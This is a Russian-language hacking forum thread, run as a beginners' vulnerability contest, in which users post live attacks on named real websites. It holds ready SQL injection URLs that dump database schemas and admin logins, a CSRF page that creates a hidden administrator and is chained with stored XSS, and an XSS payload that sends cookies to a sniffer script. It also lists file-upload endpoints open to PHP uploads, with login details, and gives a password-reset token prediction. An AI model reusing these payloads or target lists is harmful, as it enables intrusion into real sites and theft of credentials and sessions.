Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
  2. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
    Тип: SQL Injection.

    ==========================================================


    Code:
    http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),13,14+--+
    Тип:
    SQL Ijection (вывод в title, Cntr+u)

    ==========================================================


    Code:
    http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+


    Тип:
    SQL Injection
     
    #122 MaxxWell, 25 Aug 2016
    Last edited: 26 Aug 2016
  3. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    ТИЦ: 10 PR: 2
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    Вывод таблиц:
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),9,10,11,12,13,14,15,16+--+
    Вывод админа:
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0x3,username,password),9,10,11,12,13,14,15,16+from+heterodrugs.users+--+
    Version (5.5.49-cll-lve)
    Database (heterodrugs)
    User (hetero582016@localhost)


    Для простоты действий:
    ttp://heteroworld.com/cpanel/
    ttp://heteroworld.com/info.php


    P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
     
  4. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    89
    Likes Received:
    9
    Reputations:
    0
    Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

    Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
     
    #124 PoliGroS, 13 Sep 2016
    Last edited: 13 Sep 2016
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт
    Code:
    https://www.andys.md/ro/pages/login/
    http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
     
    leksadin, crlf and BabaDook like this.
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
    При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
    Code:
    http://supergut.md/ru/pages/cart/3/
    Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
    Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
    Code:
    <html>
    <head>
    </head>
       <body onload='document.forms.csrf.submit();'>
         <form action="http://supergut.md/cp/newuser/" name="csrf" method="POST" target="iframe">
           <input type="hidden" name="login" value="<style>tr:last-child{display:none;}</style>">
           <input type="hidden" name="newp" value="1">
           <input type="hidden" name="newp1" value="1">
         </form>
         <iframe src="" style="display:none;" name="iframe" ></iframe>
       </body>
    </html>
    Почему в логине
    Code:
    <style>tr:last-child{display:none;}</style> 
    потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
    Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
    Code:
    <script>
      location="http://host/csrf.html";
    </script>
    Не прошло и 5 минут я был уже в админке
    [​IMG]
    После этого была оповещена администрация которая на 2 день профиксела
     
    grimnir, EmpireTeam, Gorev and 7 others like this.
  7. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    515
    Likes Received:
    472
    Reputations:
    145
    Очень хорошая демонстрация, как XSS и CSRF на практике применяется.
     
    _________________________
  8. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Раскрытие данных
    Code:
    http://www.termosuport.md/admin/
     
  9. tro0st

    tro0st New Member

    Joined:
    28 Jul 2017
    Messages:
    14
    Likes Received:
    4
    Reputations:
    0
    Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
     
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Зачем
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    804
    Reputations:
    851
    _________________________
    grimnir, t0ma5, joelblack and 2 others like this.
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    бабадука спроси
    PS:Сиски тоже видели все но на ютубе их замазывают
     
    ShpillyWilly, grimnir and palec2006 like this.
  13. f0b0s

    f0b0s Member

    Joined:
    26 May 2011
    Messages:
    6
    Likes Received:
    8
    Reputations:
    1
    Сайт:http://www.vacbanned.com
    Уязвимость: SQL Injection
    Эксплойт:
    Code:
    http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
    MySQL > 5.0.11
    available databases [3]:
    [*] information_schema
    [*] vacbanned_dev
    [*] vacbanned_v2
     
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Засунул в инпутах фейка https://wf-code.ru
    Code:
    "><script>img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;</script><"
    Пришло
    Code:
    Cookie: PHPSESSID=a593cdb6707d2f5992dba251c386c994https://wf-code.ru/yaadmin/full.php
    [​IMG]
    [​IMG]
    Саит с доменом .ru но думаю простимо потому что фейк
     
    Alexandr17, dooble, Shubka75 and 3 others like this.
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    900
    Likes Received:
    1,148
    Reputations:
    34
    SSRF Подъехала
    Code:
    https://us.hidester.co
    [​IMG]
    Кто сможет перейти на другой протокол пишите метод
     
  16. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Arbitrary file upload 1.php.asd
    Code:
    http://ecaterix.md/ecaterix.md/kcfinder/browse.php
    http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
    http://www.oonohousing.com/member/user/kcfinder/browse.php
    http://www.golfoldcourse.com/kcfinder/browse.php
    http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
    http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
    http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
    http://ex-theatreasia.com/kcfinder/browse.php
    http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
    http://www.urfaposet.com/panel/kcfinder/browse.php
    http://www.raksthai.org/asset/kcfinder/
    http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
    http://hadu.org/kcfinder/browse.php
    
    Гуглом можно насобирать сайтов
     
    #136 Octavian, 1 Feb 2018
    Last edited: 1 Feb 2018
    BabaDook likes this.
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    435
    Likes Received:
    80
    Reputations:
    20
    Можем загружать PHP фаилы
    L:fm_admin
    P:fm_admin
    Code:
    http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
    
     
    BabaDook likes this.
  18. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,945
    Likes Received:
    7,561
    Reputations:
    108
    там оно всё дырявое куда не ткни...
    писать бесполезно - пишут, что всё починили и всё работает.
    Code:
    curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"
    
    "Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
     
    Jerri, man474019, Veil and 1 other person like this.
  19. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    204
    Likes Received:
    96
    Reputations:
    1
    + sql inject
    Code:
    http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
    
     
    HeReTiC, ms13, crlf and 1 other person like this.
Loading...